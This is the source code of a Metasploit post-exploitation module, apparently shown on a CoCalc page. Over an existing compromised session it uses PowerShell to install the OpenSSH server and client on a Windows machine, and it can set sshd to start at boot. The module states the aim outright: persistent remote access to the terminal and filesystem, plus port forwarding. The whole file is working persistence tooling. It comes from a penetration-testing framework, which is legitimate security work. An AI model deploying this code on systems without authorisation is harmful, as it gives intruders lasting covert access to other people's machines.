CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Priv
8
  include Msf::Post::File
9
  include Msf::Post::Windows::Powershell
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Install OpenSSH for Windows',
16
        'Description' => %q{
17
          This module installs OpenSSH server and client for Windows using PowerShell.
18
          SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => ['Michael Long <bluesentinel[at]protonmail.com>'],
22
        'Arch' => [ARCH_X86, ARCH_X64],
23
        'Platform' => [ 'win' ],
24
        'SessionTypes' => [ 'meterpreter', 'shell' ],
25
        'References'	=> [
26
          ['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],
27
          ['URL', 'https://github.com/PowerShell/openssh-portable']
28
        ]
29
      )
30
    )
31
    register_options(
32
      [
33
        OptBool.new('INSTALL_SERVER', [true, 'Install OpenSSH.Server for Windows', true]),
34
        OptBool.new('INSTALL_CLIENT', [true, 'Install OpenSSH.Client for Windows', true]),
35
        OptBool.new('UNINSTALL_SERVER', [true, 'Uninstall OpenSSH.Server for Windows', false]),
36
        OptBool.new('UNINSTALL_CLIENT', [true, 'Uninstall OpenSSH.Client for Windows', false]),
37
        OptString.new('SERVER_VER', [true, 'OpenSSH.Server version', 'OpenSSH.Server~~~~0.0.1.0']),
38
        OptString.new('CLIENT_VER', [true, 'OpenSSH.Client version', 'OpenSSH.Client~~~~0.0.1.0']),
39
        OptBool.new('AUTOSTART', [true, 'Sets sshd service to startup automatically at system boot for persistence', true])
40
      ]
41
    )
42
  end
43

44
  def run
45
    # check admin privileges
46
    unless is_system? || is_admin?
47
      fail_with(Failure::NotVulnerable, 'Insufficient privileges to install or remove OpenSSH')
48
    end
49

50
    # check if PowerShell is available
51
    psh_path = '\\WindowsPowerShell\\v1.0\\powershell.exe'
52
    if !file? "%WINDIR%\\System32#{psh_path}"
53
      fail_with(Failure::NotVulnerable, 'No powershell available.')
54
    end
55

56
    # uninstall OpenSSH.Server
57
    if datastore['UNINSTALL_SERVER']
58
      print_status('Uninstalling OpenSSH.Server')
59
      uninstall_ssh_server
60
    end
61

62
    # unintall OpenSSH.Client
63
    if datastore['UNINSTALL_CLIENT']
64
      print_status('Uninstalling OpenSSH.Client')
65
      uninstall_ssh_client
66
    end
67

68
    # install OpenSSH.Server
69
    if datastore['INSTALL_SERVER']
70
      print_status('Installing OpenSSH.Server')
71
      install_ssh_server
72
    end
73

74
    # install OpenSSH.Client
75
    if datastore['INSTALL_CLIENT']
76
      print_status('Installing OpenSSH.Client')
77
      install_ssh_client
78
    end
79
  end
80

81
  def install_ssh_server
82
    script = "Add-WindowsCapability -Online -Name #{datastore['SERVER_VER']}; "
83
    script << 'Start-Service sshd; '
84
    if datastore['AUTOSTART']
85
      script << "Set-Service -Name sshd -StartupType 'Automatic'"
86
    end
87
    psh_exec(script)
88
  end
89

90
  def install_ssh_client
91
    script = "Add-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}; "
92
    psh_exec(script)
93
  end
94

95
  def uninstall_ssh_server
96
    script = 'Stop-Service sshd; '
97
    script << "Remove-WindowsCapability -Online -Name #{datastore['SERVER_VER']}"
98
    psh_exec(script)
99
  end
100

101
  def uninstall_ssh_client
102
    script = "Remove-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}"
103
    psh_exec(script)
104
  end
105
end
106

107